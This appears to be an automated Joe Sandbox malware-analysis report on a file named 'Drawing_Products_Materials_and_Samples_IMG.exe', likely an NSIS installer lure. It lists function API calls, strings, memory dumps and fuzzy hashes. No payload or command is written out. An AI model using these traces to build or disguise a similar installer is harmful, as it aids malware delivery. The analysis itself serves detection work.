                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 2659869361-787714339
                                                                                      • Opcode ID: db489587f03a436ea3115729a1eb7cc5b4759721d3bad8b493c3f74dc48da956
                                                                                      • Instruction ID: a924f5e5efff63b814f2bb1aba828fa5060afbb52db2a3f4b10526d23ad23d6c
                                                                                      • Opcode Fuzzy Hash: db489587f03a436ea3115729a1eb7cc5b4759721d3bad8b493c3f74dc48da956
                                                                                      • Instruction Fuzzy Hash: 0FD0A962A059303AD2022A158C05E8F7A1CCF13301B040422F200B62A2CA3C6D418BFE
                                                                                      Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                                                                      • GlobalAlloc.KERNEL32(?,00000000,00000000,?,000000EE), ref: 00401F09
                                                                                      • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                                                                      • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                                                                        • Part of subcall function 00405ADA: wsprintfA.USER32 ref: 00405AE7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 1404258612-0
                                                                                      • Opcode ID: 15bbcb46c0304cebef2948dd90507b788932babe692363a3176a18277c5093b4
                                                                                      • Instruction ID: e997095eb8ac9b39cb2e990ea4d9d7297676044432be4d967855e01db0d67fff
                                                                                      • Opcode Fuzzy Hash: 15bbcb46c0304cebef2948dd90507b788932babe692363a3176a18277c5093b4
                                                                                      • Instruction Fuzzy Hash: 80112E71900108BEDB01EFA5DD85DAEBBB9EF04344B20807AF505F61E2D779AE54DB28
                                                                                      Function 004056C2 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharNextA.USER32(?,?,Grundsprogs.but,?,0040572E,Grundsprogs.but,Grundsprogs.but,?,?,773E3410,00405479,?,C:\Users\user\AppData\Local\Temp\,773E3410,00000000), ref: 004056D0
                                                                                      • CharNextA.USER32(00000000), ref: 004056D5
                                                                                      • CharNextA.USER32(00000000), ref: 004056E9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext
                                                                                      • String ID: Grundsprogs.but
                                                                                      • API String ID: 3213498283-3503724756
                                                                                      • Opcode ID: 594f31a488926a8360d4dc687cc681d5945629fa4112d744ade59810bb8e8aa4
                                                                                      • Instruction ID: 5a28b070b40ebc86f9924178211a5f21c719a032cfd05c28209d31321f5df37b
                                                                                      • Opcode Fuzzy Hash: 594f31a488926a8360d4dc687cc681d5945629fa4112d744ade59810bb8e8aa4
                                                                                      • Instruction Fuzzy Hash: B4F0F651909F90ABFF3252680C40B7B5B88CB55315F14047BE245772C1C27D48419F9A
                                                                                      Function 00402BCF Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000,00000000,00402DAF,00000001), ref: 00402BE2
                                                                                      • GetTickCount.KERNEL32 ref: 00402C00
                                                                                      • CreateDialogParamA.USER32(0000006F,00000000,00402B4C,00000000), ref: 00402C1D
                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402C2B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                      • String ID:
                                                                                      • API String ID: 2102729457-0
                                                                                      • Opcode ID: 11c433d574e92544add56911f42870682812084ac0052d1f61e8685336716005
                                                                                      • Instruction ID: 8678601a89ebf594b1e28a4f8d2629398f35c478b0c465e21920113c9fb71305
                                                                                      • Opcode Fuzzy Hash: 11c433d574e92544add56911f42870682812084ac0052d1f61e8685336716005
                                                                                      • Instruction Fuzzy Hash: D4F0D030909620BFC6516F58BD4CE5F7BA4E745B117518467F204A11A5C27CA8828FAD
                                                                                      Function 00405717 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00405B7C: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B89
                                                                                        • Part of subcall function 004056C2: CharNextA.USER32(?,?,Grundsprogs.but,?,0040572E,Grundsprogs.but,Grundsprogs.but,?,?,773E3410,00405479,?,C:\Users\user\AppData\Local\Temp\,773E3410,00000000), ref: 004056D0
                                                                                        • Part of subcall function 004056C2: CharNextA.USER32(00000000), ref: 004056D5
                                                                                        • Part of subcall function 004056C2: CharNextA.USER32(00000000), ref: 004056E9
                                                                                      • lstrlenA.KERNEL32(Grundsprogs.but,00000000,Grundsprogs.but,Grundsprogs.but,?,?,773E3410,00405479,?,C:\Users\user\AppData\Local\Temp\,773E3410,00000000), ref: 0040576A
                                                                                      • GetFileAttributesA.KERNEL32(Grundsprogs.but,Grundsprogs.but,Grundsprogs.but,Grundsprogs.but,Grundsprogs.but,Grundsprogs.but,00000000,Grundsprogs.but,Grundsprogs.but,?,?,773E3410,00405479,?,C:\Users\user\AppData\Local\Temp\,773E3410), ref: 0040577A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                      • String ID: Grundsprogs.but
                                                                                      • API String ID: 3248276644-3503724756
                                                                                      • Opcode ID: 5c82dc3b8e95f65848b85918bc03a8054e03177c087216e2edc28b62bc63e4a6
                                                                                      • Instruction ID: 2c4d446db1e29420e5923440945fccaca4e70662f99b186e828cb85218ee0e95
                                                                                      • Opcode Fuzzy Hash: 5c82dc3b8e95f65848b85918bc03a8054e03177c087216e2edc28b62bc63e4a6
                                                                                      • Instruction Fuzzy Hash: D8F0C835105D5096C72637391C49AAF1A55CE87334F5C0A3BFCA4B72D2DA3C8942EDAE
                                                                                      Function 00403592 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,773E3410,0040356A,004033AE,?), ref: 004035AC
                                                                                      • GlobalFree.KERNEL32(00B122D0), ref: 004035B3
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004035A4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$GlobalLibrary
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 1100898210-787714339
                                                                                      • Opcode ID: a867077822133ff692d23af0c54fa15bc8068d047174f32ce19527d60d8a5524
                                                                                      • Instruction ID: b9a2e2ce0aef398ad33b1e441a7329442b5d03f4bc4d662dbe049a431942ec15
                                                                                      • Opcode Fuzzy Hash: a867077822133ff692d23af0c54fa15bc8068d047174f32ce19527d60d8a5524
                                                                                      • Instruction Fuzzy Hash: CAE01233805530ABC6215F55FE04B5AB7686F99B23F05406BED407B2B087BCAD42CBD9
                                                                                      Function 00405670 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9F,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe,C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe,80000000,00000003), ref: 00405676
                                                                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9F,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe,C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe,80000000,00000003), ref: 00405684
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrlen
                                                                                      • String ID: C:\Users\user\Desktop
                                                                                      • API String ID: 2709904686-3443045126
                                                                                      • Opcode ID: 34a4f8c708b27f6946e7134e7721e231f8b12887e9b4f023f0af0bef71a59494
                                                                                      • Instruction ID: 65254a9ec8b5df5b99da38f47da5785a41c3eb4d4675478388f5dfb88e302bf1
                                                                                      • Opcode Fuzzy Hash: 34a4f8c708b27f6946e7134e7721e231f8b12887e9b4f023f0af0bef71a59494
                                                                                      • Instruction Fuzzy Hash: 7AD0A762808D702EF30356108C04B9F6A98CF12300F0A08A2E040A61D1D67D5C414BBE
                                                                                      Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,00000001), ref: 10001258
                                                                                        • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
                                                                                      • GlobalAlloc.KERNEL32(?,?), ref: 1000115B
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                                      • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                                      • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17896186253.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17896153967.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17896219730.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17896248787.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloclstrcpy
                                                                                      • String ID:
                                                                                      • API String ID: 852173138-0
                                                                                      • Opcode ID: c9149b92212d33adc4212204361ca6219cf995c9886f0e0edac76aa4d1876c43
                                                                                      • Instruction ID: 26a7307167ea038f6128c28db1d5d02e0c11c1c5116c5a7ce728bb40d8b914e2
                                                                                      • Opcode Fuzzy Hash: c9149b92212d33adc4212204361ca6219cf995c9886f0e0edac76aa4d1876c43
                                                                                      • Instruction Fuzzy Hash: E431BAB2808254AFF705CF64EC89AEA7FE8EB052C0B164116FA45D626CDB349910CB28
                                                                                      Function 0040578F Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,004059A1,00000000,[Rename]), ref: 0040579F
                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 004057B7
                                                                                      • CharNextA.USER32(?,?,00000000,004059A1,00000000,[Rename]), ref: 004057C8
                                                                                      • lstrlenA.KERNEL32(?,?,00000000,004059A1,00000000,[Rename]), ref: 004057D1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 190613189-0
                                                                                      • Opcode ID: 4d6aa7fcecb591248e5394db533e431d238a5c46998e6b160d14a30e062bce79
                                                                                      • Instruction ID: 45b2fc5df358d27cb7a89cd885ee1e3cc50cd312c5ff5344edc01a70ab2dde4a
                                                                                      • Opcode Fuzzy Hash: 4d6aa7fcecb591248e5394db533e431d238a5c46998e6b160d14a30e062bce79
                                                                                      • Instruction Fuzzy Hash: 71F06235504518FFC7129BA5DC4099FBBA8EF55350F2540AAE800F7250D674EE01ABA9

                                                                                      Executed Functions

                                                                                      Function 36A94C28 Relevance: 4.3, Strings: 1, Instructions: 3071COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: N
                                                                                      • API String ID: 0-1130791706
                                                                                      • Opcode ID: 2cfd961db89a1b246602a34f90364f2b4b1fc878013fa89435244d17e777a737
                                                                                      • Instruction ID: 75a72d58f138e2a13651315ca72e591744eba5ad9b1676347b4d4f519e5f95a7
                                                                                      • Opcode Fuzzy Hash: 2cfd961db89a1b246602a34f90364f2b4b1fc878013fa89435244d17e777a737
                                                                                      • Instruction Fuzzy Hash: E573F671C1075A8EDB11EF68C854AD9F7B1FF99300F51C69AE4486B221EB70AAD4CF81
                                                                                      Function 001156FA Relevance: 3.9, Strings: 3, Instructions: 189COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0oOo$LjOo$LjOo
                                                                                      • API String ID: 0-2898272262
                                                                                      • Opcode ID: f9621860ee068e6b91d7afbdfa09fe6c856f3b972a1b0596fd47f1267206602d
                                                                                      • Instruction ID: 854aecad3578b84669a923326d5cbdad9fca57d25f9b2371bbbdd901c529070b
                                                                                      • Opcode Fuzzy Hash: f9621860ee068e6b91d7afbdfa09fe6c856f3b972a1b0596fd47f1267206602d
                                                                                      • Instruction Fuzzy Hash: D181B474E01608CFEB58DFAAD944ADDBBF2BF88310F148069E819AB365DB305981DF11
                                                                                      Function 0011C9AB Relevance: 3.9, Strings: 3, Instructions: 188COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0oOo$LjOo$LjOo
                                                                                      • API String ID: 0-2898272262
